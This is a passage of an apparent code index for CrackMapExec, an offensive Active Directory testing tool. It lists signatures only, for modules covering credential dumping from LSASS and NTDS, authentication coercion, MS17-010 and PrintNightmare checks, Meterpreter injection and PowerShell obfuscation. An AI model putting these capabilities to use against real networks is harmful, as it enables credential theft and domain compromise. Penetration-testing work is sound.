method create_workspace (line 571) | def create_workspace(workspace_name, p_loader, protocols):
function delete_workspace (line 594) | def delete_workspace(workspace_name):
function initialize_db (line 598) | def initialize_db(logger):
function main (line 624) | def main():
FILE: cme/config.py
function process_secret (line 46) | def process_secret(text):
FILE: cme/connection.py
function gethost_addrinfo (line 26) | def gethost_addrinfo(hostname):
function requires_admin (line 37) | def requires_admin(func):
function dcom_FirewallChecker (line 45) | def dcom_FirewallChecker(iInterface, timeout):
class connection (line 73) | class connection(object):
method __init__ (line 74) | def __init__(self, args, db, host):
method proto_args (line 118) | def proto_args(std_parser, module_parser):
method proto_logger (line 121) | def proto_logger(self):
method enum_host_info (line 124) | def enum_host_info(self):
method print_host_info (line 127) | def print_host_info(self):
method create_conn_obj (line 130) | def create_conn_obj(self):
method check_if_admin (line 133) | def check_if_admin(self):
method kerberos_login (line 136) | def kerberos_login(
method plaintext_login (line 148) | def plaintext_login(self, domain, username, password):
method hash_login (line 151) | def hash_login(self, domain, username, ntlm_hash):
method proto_flow (line 154) | def proto_flow(self):
method call_cmd_args (line 167) | def call_cmd_args(self):
method call_modules (line 174) | def call_modules(self):
method inc_failed_login (line 207) | def inc_failed_login(self, username):
method over_fail_limit (line 218) | def over_fail_limit(self, username):
method query_db_creds (line 234) | def query_db_creds(self):
method parse_credentials (line 272) | def parse_credentials(self):
method try_credentials (line 346) | def try_credentials(self, domain, username, owned, secret, cred_type, ...
method login (line 380) | def login(self):
method mark_pwned (line 438) | def mark_pwned(self):
FILE: cme/context.py
class Context (line 8) | class Context:
method __init__ (line 9) | def __init__(self, db, logger, args):
FILE: cme/crackmapexec.py
function create_db_engine (line 50) | def create_db_engine(db_path):
function start_run (line 55) | async def start_run(protocol_obj, args, db, targets):
function main (line 77) | def main():
FILE: cme/first_run.py
function first_run_setup (line 13) | def first_run_setup(logger=cme_logger):
FILE: cme/helpers/bash.py
function get_script (line 7) | def get_script(path):
FILE: cme/helpers/bloodhound.py
function add_user_bh (line 5) | def add_user_bh(user, domain, logger, config):
FILE: cme/helpers/http.py
function get_desktop_uagent (line 7) | def get_desktop_uagent(uagent=None):
FILE: cme/helpers/logger.py
function write_log (line 8) | def write_log(data, log_name):
function highlight (line 14) | def highlight(text, color="yellow"):
FILE: cme/helpers/misc.py
function identify_target_file (line 11) | def identify_target_file(target_file):
function gen_random_string (line 23) | def gen_random_string(length=10):
function validate_ntlm (line 27) | def validate_ntlm(data):
function called_from_cmd_args (line 35) | def called_from_cmd_args():
function which (line 47) | def which(cmd, mode=os.F_OK | os.X_OK, path=None):
FILE: cme/helpers/powershell.py
function get_ps_script (line 17) | def get_ps_script(path):
function encode_ps_command (line 21) | def encode_ps_command(command):
function is_powershell_installed (line 25) | def is_powershell_installed():
function obfs_ps_script (line 31) | def obfs_ps_script(path_to_script):
function create_ps_command (line 69) | def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, cus...
function gen_ps_inject (line 168) | def gen_ps_inject(command, context=None, procname="explorer.exe", inject...
function gen_ps_iex_cradle (line 210) | def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):
function invoke_obfuscation (line 262) | def invoke_obfuscation(script_string):
FILE: cme/loaders/moduleloader.py
class ModuleLoader (line 18) | class ModuleLoader:
method __init__ (line 19) | def __init__(self, args, db, logger):
method module_is_sane (line 24) | def module_is_sane(self, module, module_path):
method load_module (line 58) | def load_module(self, module_path):
method init_module (line 73) | def init_module(self, module_path):
method get_module_info (line 101) | def get_module_info(self, module_path):
method list_modules (line 126) | def list_modules(self):
FILE: cme/loaders/protocolloader.py
class ProtocolLoader (line 11) | class ProtocolLoader:
method __init__ (line 12) | def __init__(self):
method load_protocol (line 15) | def load_protocol(self, protocol_path):
method get_protocols (line 21) | def get_protocols(self):
FILE: cme/logger.py
class CMEAdapter (line 17) | class CMEAdapter(logging.LoggerAdapter):
method __init__ (line 18) | def __init__(self, extra=None):
method format (line 39) | def format(self, msg, *args, **kwargs):
method display (line 76) | def display(self, msg, *args, **kwargs):
method success (line 91) | def success(self, msg, color='green', *args, **kwargs):
method highlight (line 106) | def highlight(self, msg, *args, **kwargs):
method fail (line 121) | def fail(self, msg, color='red', *args, **kwargs):
method log_console_to_file (line 135) | def log_console_to_file(self, text, *args, **kwargs):
method add_file_log (line 161) | def add_file_log(self, log_file=None):
method init_log_file (line 183) | def init_log_file():
class TermEscapeCodeFormatter (line 196) | class TermEscapeCodeFormatter(logging.Formatter):
method __init__ (line 199) | def __init__(self, fmt=None, datefmt=None, style="%", validate=True):
method format (line 202) | def format(self, record):
FILE: cme/modules/IOXIDResolver.py
class CMEModule (line 14) | class CMEModule:
method options (line 21) | def options(self, context, module_options):
method on_login (line 24) | def on_login(self, context, connection):
FILE: cme/modules/MachineAccountQuota.py
class CMEModule (line 5) | class CMEModule:
method options (line 17) | def options(self, context, module_options):
method on_login (line 26) | def on_login(self, context, connection):
FILE: cme/modules/adcs.py
class CMEModule (line 8) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 27) | def options(self, context, module_options):
method on_login (line 42) | def on_login(self, context, connection):
method process_servers (line 79) | def process_servers(self, item):
method process_templates (line 115) | def process_templates(self, item):
FILE: cme/modules/add_computer.py
class CMEModule (line 8) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_login (line 63) | def on_login(self, context, connection):
method doSAMRAdd (line 97) | def doSAMRAdd(self,context):
method doLDAPSAdd (line 262) | def doLDAPSAdd(self, connection, context):
FILE: cme/modules/appcmd.py
class CMEModule (line 3) | class CMEModule:
method __init__ (line 17) | def __init__(self):
method options (line 20) | def options(self, context, module_options):
method on_admin_login (line 23) | def on_admin_login(self, context, connection):
method check_appcmd (line 26) | def check_appcmd(self, context, connection):
method execute_appcmd (line 45) | def execute_appcmd(self, context, connection):
FILE: cme/modules/bh_owned.py
class CMEModule (line 14) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method on_admin_login (line 51) | def on_admin_login(self, context, connection):
FILE: cme/modules/daclread.py
class RIGHTS_GUID (line 100) | class RIGHTS_GUID(Enum):
class ACE_FLAGS (line 110) | class ACE_FLAGS(Enum):
class OBJECT_ACE_FLAGS (line 124) | class OBJECT_ACE_FLAGS(Enum):
class ACCESS_MASK (line 133) | class ACCESS_MASK(Enum):
class SIMPLE_PERMISSIONS (line 168) | class SIMPLE_PERMISSIONS(Enum):
class ALLOWED_OBJECT_ACE_MASK_FLAGS (line 181) | class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
class CMEModule (line 190) | class CMEModule:
method __init__ (line 204) | def __init__(self, context=None, module_options=None):
method options (line 208) | def options(self, context, module_options):
method on_login (line 266) | def on_login(self, context, connection):
method read (line 339) | def read(self, context):
method backup (line 346) | def backup(self, context):
method search_target_principal_security_descriptor (line 361) | def search_target_principal_security_descriptor(self, context, connect...
method get_user_info (line 390) | def get_user_info(self, context, samname):
method resolveSID (line 406) | def resolveSID(self, context, sid):
method parse_dacl (line 436) | def parse_dacl(self, context, dacl):
method parse_perms (line 449) | def parse_perms(self, fsr):
method parse_ace (line 462) | def parse_ace(self, context, ace):
method print_parsed_dacl (line 549) | def print_parsed_dacl(self, context, parsed_dacl):
method print_parsed_ace (line 607) | def print_parsed_ace(self, parsed_ace):
method build_guids_for_rights (line 613) | def build_guids_for_rights(self):
FILE: cme/modules/dfscoerce.py
class CMEModule (line 13) | class CMEModule:
method __init__ (line 20) | def __init__(self, context=None, module_options=None):
method options (line 25) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
class DCERPCSessionError (line 58) | class DCERPCSessionError(DCERPCException):
method __init__ (line 59) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 62) | def __str__(self):
class NetrDfsRemoveStdRoot (line 79) | class NetrDfsRemoveStdRoot(NDRCALL):
class NetrDfsRemoveStdRootResponse (line 88) | class NetrDfsRemoveStdRootResponse(NDRCALL):
class NetrDfsAddRoot (line 92) | class NetrDfsAddRoot(NDRCALL):
class NetrDfsAddRootResponse (line 102) | class NetrDfsAddRootResponse(NDRCALL):
class TriggerAuth (line 106) | class TriggerAuth:
method connect (line 107) | def connect(self, username, password, domain, lmhash, nthash, aesKey, ...
method NetrDfsRemoveStdRoot (line 140) | def NetrDfsRemoveStdRoot(self, dce, listener):
FILE: cme/modules/drop-sc.py
class CMEModule (line 7) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 66) | def on_login(self, context, connection):
FILE: cme/modules/empire_exec.py
class CMEModule (line 14) | class CMEModule:
method options (line 26) | def options(self, context, module_options):
method on_admin_login (line 135) | def on_admin_login(self, context, connection):
FILE: cme/modules/enum_av.py
class CMEModule (line 13) | class CMEModule:
method __init__ (line 25) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
method dump_results (line 87) | def dump_results(self, results, remoteName, success, context):
class LsaLookupNames (line 108) | class LsaLookupNames:
method __init__ (line 118) | def __init__(
method connect (line 141) | def connect(self, string_binding=None, iface_uuid=None):
method open_policy (line 184) | def open_policy(self, dce):
method LsarLookupNames (line 195) | def LsarLookupNames(self, dce, policyHandle, service):
FILE: cme/modules/enum_dns.py
class CMEModule (line 8) | class CMEModule:
method __init__ (line 20) | def __init__(self, context=None, module_options=None):
method options (line 25) | def options(self, context, module_options):
method on_admin_login (line 33) | def on_admin_login(self, context, connection):
FILE: cme/modules/example_module.py
class CMEModule (line 5) | class CMEModule:
method __init__ (line 17) | def __init__(self, context=None, module_options=None):
method options (line 21) | def options(self, context, module_options):
method on_login (line 27) | def on_login(self, context, connection):
method on_admin_login (line 49) | def on_admin_login(self, context, connection):
method on_request (line 56) | def on_request(self, context, request):
method on_response (line 62) | def on_response(self, context, response):
method on_shutdown (line 68) | def on_shutdown(self, context, connection):
FILE: cme/modules/find-computer.py
class CMEModule (line 6) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 36) | def on_login(self, context, connection):
FILE: cme/modules/firefox.py
class CMEModule (line 6) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_admin_login (line 23) | def on_admin_login(self, context, connection):
FILE: cme/modules/get-desc-users.py
class CMEModule (line 10) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_login (line 39) | def on_login(self, context, connection):
method filter_answer (line 87) | def filter_answer(self, context, answers):
FILE: cme/modules/get_netconnections.py
class CMEModule (line 9) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_admin_login (line 28) | def on_admin_login(self, context, connection):
FILE: cme/modules/gpp_autologin.py
class CMEModule (line 8) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 23) | def on_login(self, context, connection):
FILE: cme/modules/gpp_password.py
class CMEModule (line 11) | class CMEModule:
method options (line 23) | def options(self, context, module_options):
method on_login (line 26) | def on_login(self, context, connection):
method decrypt_cpassword (line 106) | def decrypt_cpassword(self, cpassword):
FILE: cme/modules/group_members.py
class CMEModule (line 6) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_login (line 38) | def on_login(self, context, connection):
function doSearch (line 70) | def doSearch(self,context, connection,searchFilter,attributeName):
FILE: cme/modules/groupmembership.py
class CMEModule (line 8) | class CMEModule:
method options (line 23) | def options(self, context, module_options):
method on_login (line 38) | def on_login(self, context, connection):
FILE: cme/modules/handlekatz.py
class CMEModule (line 15) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_admin_login (line 54) | def on_admin_login(self, context, connection):
FILE: cme/modules/hash_spider.py
function neo4j_conn (line 20) | def neo4j_conn(context, connection, driver):
function neo4j_local_admins (line 39) | def neo4j_local_admins(context, driver):
function create_db (line 51) | def create_db(local_admins, dbconnection, cursor):
function process_creds (line 76) | def process_creds(context, connection, credentials_data, dbconnection, c...
function initial_run (line 123) | def initial_run(connection, cursor):
class CMEModule (line 137) | class CMEModule:
method __init__ (line 144) | def __init__(self, context=None, module_options=None):
method save_credentials (line 151) | def save_credentials(context, connection, domain, username, password, ...
method options (line 159) | def options(self, context, module_options):
method run_lsassy (line 171) | def run_lsassy(self, context, connection, cursor): # copied and paste...
method spider_pcs (line 237) | def spider_pcs(self, context, connection, cursor, dbconnection, driver):
method on_admin_login (line 273) | def on_admin_login(self, context, connection):
FILE: cme/modules/impersonate.py
class CMEModule (line 10) | class CMEModule:
method options (line 18) | def options(self, context, module_options):
method list_available_primary_tokens (line 42) | def list_available_primary_tokens(self, _, connection):
method on_admin_login (line 46) | def on_admin_login(self, context, connection):
FILE: cme/modules/install_elevated.py
class CMEModule (line 9) | class CMEModule:
method options (line 16) | def options(self, context, module_options):
method on_admin_login (line 19) | def on_admin_login(self, context, connection):
FILE: cme/modules/keepass_discover.py
class CMEModule (line 4) | class CMEModule:
method __init__ (line 18) | def __init__(self):
method options (line 22) | def options(self, context, module_options):
method on_admin_login (line 39) | def on_admin_login(self, context, connection):
FILE: cme/modules/keepass_trigger.py
class CMEModule (line 13) | class CMEModule:
method __init__ (line 31) | def __init__(self):
method options (line 58) | def options(self, context, module_options):
method on_admin_login (line 127) | def on_admin_login(self, context, connection):
method add_trigger (line 142) | def add_trigger(self, context, connection):
method check_trigger_added (line 179) | def check_trigger_added(self, context, connection):
method restart (line 187) | def restart(self, context, connection):
method poll (line 246) | def poll(self, context, connection):
method clean (line 292) | def clean(self, context, connection):
method all_in_one (line 339) | def all_in_one(self, context, connection):
method trigger_added (line 354) | def trigger_added(self, context, connection):
method put_file_execute_delete (line 381) | def put_file_execute_delete(self, context, connection, psh_script_str):
method extract_password (line 390) | def extract_password(self, context):
FILE: cme/modules/laps.py
class CMEModule (line 8) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
FILE: cme/modules/ldap-checker.py
class CMEModule (line 16) | class CMEModule:
method options (line 30) | def options(self, context, module_options):
method on_login (line 36) | def on_login(self, context, connection):
FILE: cme/modules/lsassy_dump.py
class CMEModule (line 17) | class CMEModule:
method __init__ (line 24) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method on_admin_login (line 37) | def on_admin_login(self, context, connection):
method process_credentials (line 125) | def process_credentials(self, context, connection, credentials):
method print_credentials (line 157) | def print_credentials(context, domain, username, password, lmhash, nth...
method save_credentials (line 164) | def save_credentials(context, connection, domain, username, password, ...
FILE: cme/modules/masky.py
class CMEModule (line 8) | class CMEModule:
method options (line 15) | def options(self, context, module_options):
method on_admin_login (line 41) | def on_admin_login(self, context, connection):
method process_results (line 75) | def process_results(self, connection, context, rslts, tracker):
method process_credentials (line 98) | def process_credentials(self, connection, context, user):
method process_errors (line 109) | def process_errors(self, context, tracker):
FILE: cme/modules/met_inject.py
class CMEModule (line 7) | class CMEModule:
method __init__ (line 19) | def __init__(self, context=None, module_options=None):
method options (line 27) | def options(self, context, module_options):
method on_admin_login (line 59) | def on_admin_login(self, context, connection):
FILE: cme/modules/ms17-010.py
class CMEModule (line 12) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_login (line 22) | def on_login(self, context, connection):
class SMB_HEADER (line 28) | class SMB_HEADER(Structure):
method __new__ (line 50) | def __new__(self, buffer=None):
function generate_smb_proto_payload (line 54) | def generate_smb_proto_payload(*protos):
function calculate_doublepulsar_xor_key (line 62) | def calculate_doublepulsar_xor_key(s):
function negotiate_proto_request (line 69) | def negotiate_proto_request():
function session_setup_andx_request (line 104) | def session_setup_andx_request():
function tree_connect_andx_request (line 146) | def tree_connect_andx_request(ip, userid):
function peeknamedpipe_request (line 188) | def peeknamedpipe_request(treeid, processid, userid, multiplex_id):
function trans2_request (line 234) | def trans2_request(treeid, processid, userid, multiplex_id):
function check (line 279) | def check(ip, port=445):
FILE: cme/modules/msol.py
class CMEModule (line 9) | class CMEModule:
method __init__ (line 16) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method exec_script (line 47) | def exec_script(self, _, connection):
method on_admin_login (line 51) | def on_admin_login(self, context, connection):
FILE: cme/modules/mssql_priv.py
class User (line 10) | class User:
method __init__ (line 11) | def __init__(self, username):
method __str__ (line 20) | def __str__(self):
class CMEModule (line 24) | class CMEModule:
method __init__ (line 35) | def __init__(self):
method options (line 43) | def options(self, context, module_options):
method on_login (line 56) | def on_login(self, context, connection):
method build_exec_as_from_path (line 97) | def build_exec_as_from_path(self, target_user):
method browse_path (line 107) | def browse_path(self, context, initial_user: User, user: User) -> User:
method query_and_get_output (line 125) | def query_and_get_output(self, query):
method sql_exec_as (line 135) | def sql_exec_as(self, grantors: list) -> str:
method perform_impersonation_check (line 141) | def perform_impersonation_check(self, user: User, grantors=[]):
method update_priv (line 162) | def update_priv(self, user: User, exec_as=""):
method get_current_username (line 169) | def get_current_username(self) -> str:
method is_admin (line 172) | def is_admin(self, exec_as="") -> bool:
method get_databases (line 184) | def get_databases(self, exec_as="") -> list:
method is_dbowner (line 192) | def is_dbowner(self, database, exec_as="") -> bool:
method find_dbowner_priv (line 211) | def find_dbowner_priv(self, databases, exec_as="") -> list:
method find_trusted_db (line 218) | def find_trusted_db(self, exec_as="") -> list:
method check_dbowner_privesc (line 233) | def check_dbowner_privesc(self, exec_as=""):
method do_dbowner_privesc (line 243) | def do_dbowner_privesc(self, database, exec_as=""):
method do_impersonation_privesc (line 259) | def do_impersonation_privesc(self, username, exec_as=""):
method get_impersonate_users (line 266) | def get_impersonate_users(self, exec_as="") -> list:
method remove_sysadmin_priv (line 278) | def remove_sysadmin_priv(self) -> bool:
method is_admin_user (line 282) | def is_admin_user(self, username) -> bool:
method revert_context (line 293) | def revert_context(self, exec_as):
FILE: cme/modules/nanodump.py
class CMEModule (line 16) | class CMEModule:
method __init__ (line 23) | def __init__(self, context=None, module_options=None):
method options (line 36) | def options(self, context, module_options):
method on_admin_login (line 83) | def on_admin_login(self, context, connection):
method delete_nanodump_binary (line 267) | def delete_nanodump_binary(self):
FILE: cme/modules/nopac.py
class CMEModule (line 13) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 23) | def on_login(self, context, connection):
FILE: cme/modules/ntdsutil.py
class CMEModule (line 12) | class CMEModule:
method options (line 25) | def options(self, context, module_options):
method on_admin_login (line 43) | def on_admin_login(self, context, connection):
FILE: cme/modules/ntlmv1.py
class CMEModule (line 9) | class CMEModule:
method options (line 21) | def options(self, context, module_options):
method on_admin_login (line 24) | def on_admin_login(self, context, connection):
FILE: cme/modules/petitpotam.py
class CMEModule (line 22) | class CMEModule:
method options (line 29) | def options(self, context, module_options):
method on_login (line 41) | def on_login(self, context, connection):
class DCERPCSessionError (line 74) | class DCERPCSessionError(DCERPCException):
method __init__ (line 75) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 78) | def __str__(self):
class EXIMPORT_CONTEXT_HANDLE (line 95) | class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
class EFS_EXIM_PIPE (line 100) | class EFS_EXIM_PIPE(NDRSTRUCT):
class EFS_HASH_BLOB (line 105) | class EFS_HASH_BLOB(NDRSTRUCT):
class EFS_RPC_BLOB (line 112) | class EFS_RPC_BLOB(NDRSTRUCT):
class EFS_CERTIFICATE_BLOB (line 119) | class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH (line 127) | class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE (line 136) | class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH_LIST (line 144) | class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
class ENCRYPTED_FILE_METADATA_SIGNATURE (line 152) | class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_LIST (line 161) | class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
class EfsRpcOpenFileRaw (line 169) | class EfsRpcOpenFileRaw(NDRCALL):
class EfsRpcOpenFileRawResponse (line 177) | class EfsRpcOpenFileRawResponse(NDRCALL):
class EfsRpcEncryptFileSrv (line 184) | class EfsRpcEncryptFileSrv(NDRCALL):
class EfsRpcEncryptFileSrvResponse (line 189) | class EfsRpcEncryptFileSrvResponse(NDRCALL):
function coerce (line 193) | def coerce(
function efs_rpc_open_file_raw (line 268) | def efs_rpc_open_file_raw(dce, listener, context=None):
FILE: cme/modules/pi.py
class CMEModule (line 5) | class CMEModule:
method options (line 13) | def options(self, context, module_options):
method on_admin_login (line 35) | def on_admin_login(self, context, connection):
FILE: cme/modules/printnightmare.py
class CMEModule (line 19) | class CMEModule:
method __init__ (line 31) | def __init__(self, context=None, module_options=None):
method options (line 37) | def options(self, context, module_options):
method on_login (line 45) | def on_login(self, context, connection):
class DCERPCSessionError (line 113) | class DCERPCSessionError(DCERPCException):
method __init__ (line 114) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 117) | def __str__(self):
class DRIVER_INFO_1 (line 154) | class DRIVER_INFO_1(NDRSTRUCT):
class PDRIVER_INFO_1 (line 158) | class PDRIVER_INFO_1(NDRPOINTER):
class DRIVER_INFO_2 (line 163) | class DRIVER_INFO_2(NDRSTRUCT):
class PDRIVER_INFO_2 (line 174) | class PDRIVER_INFO_2(NDRPOINTER):
class DRIVER_INFO_2_BLOB (line 178) | class DRIVER_INFO_2_BLOB(Structure):
method __init__ (line 188) | def __init__(self, data=None):
method fromString (line 191) | def fromString(self, data, offset=0):
class DRIVER_INFO_2_ARRAY (line 204) | class DRIVER_INFO_2_ARRAY(Structure):
method __init__ (line 205) | def __init__(self, data=None, pcReturned=None):
class DRIVER_INFO_UNION (line 216) | class DRIVER_INFO_UNION(NDRUNION):
class DRIVER_CONTAINER (line 222) | class DRIVER_CONTAINER(NDRSTRUCT):
class RpcEnumPrinterDrivers (line 230) | class RpcEnumPrinterDrivers(NDRCALL):
class RpcEnumPrinterDriversResponse (line 241) | class RpcEnumPrinterDriversResponse(NDRCALL):
class RpcAddPrinterDriverEx (line 251) | class RpcAddPrinterDriverEx(NDRCALL):
class RpcAddPrinterDriverExResponse (line 260) | class RpcAddPrinterDriverExResponse(NDRCALL):
class RpcDeletePrinterDriverEx (line 265) | class RpcDeletePrinterDriverEx(NDRCALL):
class RpcDeletePrinterDriverExResponse (line 276) | class RpcDeletePrinterDriverExResponse(NDRCALL):
function hRpcAddPrinterDriverEx (line 293) | def hRpcAddPrinterDriverEx(dce, pName, pDriverContainer, dwFileCopyFlags):
FILE: cme/modules/procdump.py
class CMEModule (line 17) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_admin_login (line 57) | def on_admin_login(self, context, connection):
FILE: cme/modules/pso.py
class CMEModule (line 10) | class CMEModule:
method options (line 38) | def options(self, context, module_options):
method convert_time_field (line 44) | def convert_time_field(self, field, value):
method on_login (line 57) | def on_login(self, context, connection):
FILE: cme/modules/rdcman.py
class CMEModule (line 13) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_admin_login (line 35) | def on_admin_login(self, context, connection):
FILE: cme/modules/rdp.py
class CMEModule (line 16) | class CMEModule:
method __init__ (line 23) | def __init__(self, context=None, module_options=None):
method options (line 28) | def options(self, context, module_options):
method on_admin_login (line 71) | def on_admin_login(self, context, connection):
class rdp_SMB (line 110) | class rdp_SMB:
method __init__ (line 111) | def __init__(self, context, connection):
method rdp_Wrapper (line 117) | def rdp_Wrapper(self, action):
method rdp_RAMWrapper (line 156) | def rdp_RAMWrapper(self, action):
method query_RDPPort (line 191) | def query_RDPPort(self, remoteOps, regHandle):
method firewall_CMD (line 205) | def firewall_CMD(self, action):
class rdp_WMI (line 214) | class rdp_WMI:
method __init__ (line 215) | def __init__(self, context, connection, timeout):
method rdp_Wrapper (line 262) | def rdp_Wrapper(self, action, old=False):
method query_RDPResult (line 295) | def query_RDPResult(self, old=False):
method query_RDPPort (line 320) | def query_RDPPort(self):
method rdp_RAMWrapper (line 328) | def rdp_RAMWrapper(self, action):
FILE: cme/modules/reg-query.py
class CMEModule (line 9) | class CMEModule:
method __init__ (line 16) | def __init__(self, context=None, module_options=None):
method options (line 25) | def options(self, context, module_options):
method on_admin_login (line 80) | def on_admin_login(self, context, connection):
FILE: cme/modules/runasppl.py
class CMEModule (line 5) | class CMEModule:
method __init__ (line 12) | def __init__(self, context=None, module_options=None):
method options (line 16) | def options(self, context, module_options):
method on_admin_login (line 19) | def on_admin_login(self, context, connection):
FILE: cme/modules/scan-network.py
function get_dns_zones (line 18) | def get_dns_zones(connection, root, debug=False):
function get_dns_resolver (line 28) | def get_dns_resolver(server, context):
function ldap2domain (line 45) | def ldap2domain(ldap):
function new_record (line 49) | def new_record(rtype, serial):
function searchResEntry_to_dict (line 74) | def searchResEntry_to_dict(results):
class CMEModule (line 83) | class CMEModule:
method options (line 90) | def options(self, context, module_options):
method on_login (line 116) | def on_login(self, context, connection):
class DNS_RECORD (line 200) | class DNS_RECORD(Structure):
class DNS_RPC_NAME (line 229) | class DNS_RPC_NAME(Structure):
class DNS_COUNT_NAME (line 240) | class DNS_COUNT_NAME(Structure):
method toFqdn (line 250) | def toFqdn(self):
class DNS_RPC_NODE (line 262) | class DNS_RPC_NODE(Structure):
class DNS_RPC_RECORD_A (line 277) | class DNS_RPC_RECORD_A(Structure):
method formatCanonical (line 285) | def formatCanonical(self):
method fromCanonical (line 288) | def fromCanonical(self, canonical):
class DNS_RPC_RECORD_NODE_NAME (line 292) | class DNS_RPC_RECORD_NODE_NAME(Structure):
class DNS_RPC_RECORD_SOA (line 301) | class DNS_RPC_RECORD_SOA(Structure):
class DNS_RPC_RECORD_NULL (line 318) | class DNS_RPC_RECORD_NULL(Structure):
class DNS_RPC_RECORD_NAME_PREFERENCE (line 330) | class DNS_RPC_RECORD_NAME_PREFERENCE(Structure):
class DNS_RPC_RECORD_AAAA (line 342) | class DNS_RPC_RECORD_AAAA(Structure):
method formatCanonical (line 350) | def formatCanonical(self):
class DNS_RPC_RECORD_SRV (line 354) | class DNS_RPC_RECORD_SRV(Structure):
class DNS_RPC_RECORD_TS (line 368) | class DNS_RPC_RECORD_TS(Structure):
method toDatetime (line 376) | def toDatetime(self):
FILE: cme/modules/scuffy.py
class CMEModule (line 8) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 30) | def options(self, context, module_options):
method on_login (line 61) | def on_login(self, context, connection):
FILE: cme/modules/shadowcoerce.py
class CMEModule (line 20) | class CMEModule:
method options (line 27) | def options(self, context, module_options):
method on_login (line 40) | def on_login(self, context, connection):
class DCERPCSessionError (line 93) | class DCERPCSessionError(DCERPCException):
method __init__ (line 94) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 97) | def __str__(self):
class IsPathSupported (line 161) | class IsPathSupported(NDRCALL):
class IsPathSupportedResponse (line 166) | class IsPathSupportedResponse(NDRCALL):
class IsPathShadowCopied (line 173) | class IsPathShadowCopied(NDRCALL):
class IsPathShadowCopiedResponse (line 178) | class IsPathShadowCopiedResponse(NDRCALL):
class CoerceAuth (line 191) | class CoerceAuth:
method connect (line 192) | def connect(
method IsPathShadowCopied (line 254) | def IsPathShadowCopied(self, dce, listener):
method IsPathSupported (line 270) | def IsPathSupported(self, dce, listener):
FILE: cme/modules/slinky.py
class CMEModule (line 9) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 30) | def options(self, context, module_options):
method on_login (line 60) | def on_login(self, context, connection):
FILE: cme/modules/spider_plus.py
function human_size (line 17) | def human_size(nbytes):
function human_time (line 37) | def human_time(timestamp):
function make_dirs (line 44) | def make_dirs(path):
function get_list_from_option (line 57) | def get_list_from_option(opt):
class SMBSpiderPlus (line 65) | class SMBSpiderPlus:
method __init__ (line 66) | def __init__(
method reconnect (line 108) | def reconnect(self):
method list_path (line 124) | def list_path(self, share, subfolder):
method get_remote_file (line 146) | def get_remote_file(self, share, path):
method read_chunk (line 157) | def read_chunk(self, remote_file, chunk_size=CHUNK_SIZE):
method get_file_save_path (line 185) | def get_file_save_path(self, remote_file):
method spider_shares (line 203) | def spider_shares(self):
method spider_folder (line 255) | def spider_folder(self, share_name, folder):
method parse_file (line 288) | def parse_file(self, share_name, file_path, file_info):
method save_file (line 366) | def save_file(self, remote_file, share_name):
method dump_folder_metadata (line 398) | def dump_folder_metadata(self, results):
method print_stats (line 411) | def print_stats(self):
class CMEModule (line 500) | class CMEModule:
method options (line 513) | def options(self, context, module_options):
method on_login (line 536) | def on_login(self, context, connection):
FILE: cme/modules/spooler.py
class CMEModule (line 20) | class CMEModule:
method __init__ (line 32) | def __init__(self, context=None, module_options=None):
method options (line 38) | def options(self, context, module_options):
method on_login (line 46) | def on_login(self, context, connection):
method __fetch_list (line 126) | def __fetch_list(self, rpctransport):
FILE: cme/modules/subnets.py
function searchResEntry_to_dict (line 7) | def searchResEntry_to_dict(results):
class CMEModule (line 16) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_login (line 48) | def on_login(self, context, connection):
FILE: cme/modules/teams_localdb.py
class CMEModule (line 7) | class CMEModule:
method options (line 14) | def options(self, context, module_options):
method on_admin_login (line 17) | def on_admin_login(self, context, connection):
method parse_file (line 42) | def parse_file(context, name):
FILE: cme/modules/test_connection.py
class CMEModule (line 7) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_admin_login (line 31) | def on_admin_login(self, context, connection):
FILE: cme/modules/trust.py
class CMEModule (line 4) | class CMEModule:
method options (line 15) | def options(self, context, module_options):
method on_login (line 18) | def on_login(self, context, connection):
FILE: cme/modules/uac.py
class CMEModule (line 9) | class CMEModule:
